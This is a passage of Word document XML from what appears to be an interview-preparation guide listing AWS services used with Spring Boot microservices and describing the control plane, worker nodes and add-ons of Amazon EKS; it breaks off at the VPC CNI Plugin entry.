          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which services have you used</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="852"/>
    </w:p>
    <w:p w14:paraId="13BBF76F" w14:textId="20CB48AF" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF" w:rsidP="00C632D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 xml:space="preserve">Here’s a list of </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AWS services commonly used in real-world projects</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, especially for Java Spring Boot &amp; microservices applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D100CAE" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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EA92B89">
          <v:rect id="_x0000_i3452" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC34142" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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Compute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAB56D8" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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EC2 (Elastic Compute Cloud)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To host Spring Boot apps on virtual machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042F7C75" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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ECS (Elastic Container Service)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For containerized microservices using Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC63BD8" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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EKS (Elastic Kubernetes Service)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For orchestrating containers with Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF28ECE" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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Lambda</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For serverless functions (lightweight tasks, event-based processing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335D5DA9" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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2AF7F4B2">
          <v:rect id="_x0000_i3453" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDEFAA8" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4842C5D7" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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S3 (Simple Storage Service)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For storing files, logs, images, backups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AC9588" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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EBS (Elastic Block Store)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Persistent storage for EC2 volumes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF166BD" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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57326E9">
          <v:rect id="_x0000_i3454" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FF1C73" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F36608" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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RDS (Relational Database Service)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Managed PostgreSQL, MySQL, Oracle, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9E1D39" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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DynamoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: NoSQL database for fast, scalable data access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD3BECA" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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urora</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: High-performance, MySQL/PostgreSQL-compatible database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154B363C" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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DA86EBF">
          <v:rect id="_x0000_i3455" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C5007" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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Networking &amp; Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3346C0CF" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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VPC (Virtual Private Cloud)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Isolated network environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5F9BBE" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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Security Groups</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Firewall rules for EC2/ECS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE6A57F" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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IAM (Identity and Access Management)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: User and role permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D67D6A6" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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LB (Application Load Balancer)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Load balancing for ECS/EC2 services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A26C28" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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Route 53</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Domain registration and DNS routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191C09CF" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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1AD4E69">
          <v:rect id="_x0000_i3456" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B1046B" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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Monitoring &amp; Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19035BE2" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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CloudWatch</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Monitoring, logs, metrics, alarms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E8ACDE" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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X-Ray</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Distributed tracing for microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693C8A3A" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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CloudTrail</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Auditing and activity logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528FBB25" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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0A5CE63">
          <v:rect id="_x0000_i3457" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0B5FBE" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2264EC0B" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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CodePipeline</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: CI/CD pipeline automation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C02AC1" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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CodeBuild</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Build and test code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B34EFE7" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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CodeDeploy</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Automated deployment to EC2, ECS, Lambda.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E436D4" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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3EB874D">
          <v:rect id="_x0000_i3458" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5618288C" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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Messaging &amp; Eventing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D87246" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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SQS (Simple Queue Service)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Decoupled messaging between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A4EB74" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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SNS (Simple Notification Service)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Publish-subscribe messaging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E99D13" w14:textId="77777777" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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EventBridge</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Event-driven architecture integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C1F774" w14:textId="0EF11BFE" w:rsidR="00D61854" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D6185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2D20AB2">
          <v:rect id="_x0000_i3459" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BE9C1E" w14:textId="402BD426" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="003002AA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="853" w:name="_Toc196308333"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are different services in EKS</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="853"/>
    </w:p>
    <w:p w14:paraId="22ACDD70" w14:textId="49A6DF78" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6" w:rsidP="00C632D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Amazon EKS (Elastic Kubernetes Service)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, various Kubernetes-native services are available and integrated to manage and deploy containerized applications efficiently. Below is a breakdown of key services and components involved in </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EKS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB7CDB4" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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A683DE7">
          <v:rect id="_x0000_i3460" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B6AB1" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6"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1. Control Plane (Managed by AWS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5818C07F"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AWS manages this part for you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489DAAD1"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kube-apiserver</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Front door to the cluster, processes API requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AEF63B"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etcd</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Key-value store backing Kubernetes state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A291B43"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kube-scheduler</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Schedules pods to appropriate nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2607AD69"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kube-controller-manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Manages controllers like replication, endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F946758"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Cloud Controller Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Interfaces with AWS infrastructure (e.g., ELB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4D5869" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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C1B76A6">
          <v:rect id="_x0000_i3461" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71458BE2" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6"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2. Worker Nodes (EC2 Instances or Fargate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141451D8"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Where your containers run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A947EF1"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 xml:space="preserve">Can be managed EC2 nodes or </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>serverless with Fargate</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD6DB96"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Each node runs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B2E2E2" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6" w:rsidP="00C632D7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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kubelet (talks to API server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B6C653" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6" w:rsidP="00C632D7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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kube-proxy (networking rules for pod communication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E35044" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6" w:rsidP="00C632D7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Container runtime (like containerd or Docker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508B330B" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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4A38CD5">
          <v:rect id="_x0000_i3462" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07320DE2" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6"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3. EKS Services &amp; Add-ons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264B4542"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lastRenderedPageBreak/>
        <w:t>These are services/features you can enable or integrate in your EKS cluster:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ACCA9F" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6"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Networking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE600D6"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VPC CNI Plugin</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
